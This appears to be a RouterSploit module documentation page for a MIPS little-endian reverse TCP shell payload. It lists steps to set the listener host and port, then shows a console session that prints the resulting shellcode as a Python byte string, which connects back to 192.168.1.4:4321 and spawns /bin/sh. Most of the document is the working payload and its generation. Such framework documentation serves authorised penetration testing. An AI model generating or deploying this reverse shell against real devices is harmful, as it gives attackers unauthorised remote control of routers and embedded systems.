## Description Module generates payload that creates interactive tcp reverse shell for MIPSLE architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/mipsle/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates mipsle reverse shell tcp payload ## Scenarios ``` rsf > use payloads/mipsle/reverse_tcp rsf (MIPSLE Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (MIPSLE Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (MIPSLE Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04" "\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20" "\x80\x01\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27" "\x20\x80\x01\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24" "\x0c\x09\x09\x01\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09" "\x01\xc9\x0f\x02\x24\x0c\x09\x09\x01\x10\xe1\x05\x3c\x02\x00" "\xa5\x34\xf8\xff\xa5\xaf\x01\x04\x05\x3c\xc0\xa8\xa5\x34\xfc" "\xff\xa5\xaf\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01" "\x4a\x10\x02\x24\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08" "\x35\xec\xff\xa8\xaf\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff" "\xa8\xaf\xff\xff\x07\x28\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec" "\xff\xa4\x23\xec\xff\xa8\x23\xf8\xff\xa8\xaf\xf8\xff\xa5\x23" "\xec\xff\xbd\x27\xff\xff\x06\x28\xab\x0f\x02\x24\x0c\x09\x09" "\x01" ) ```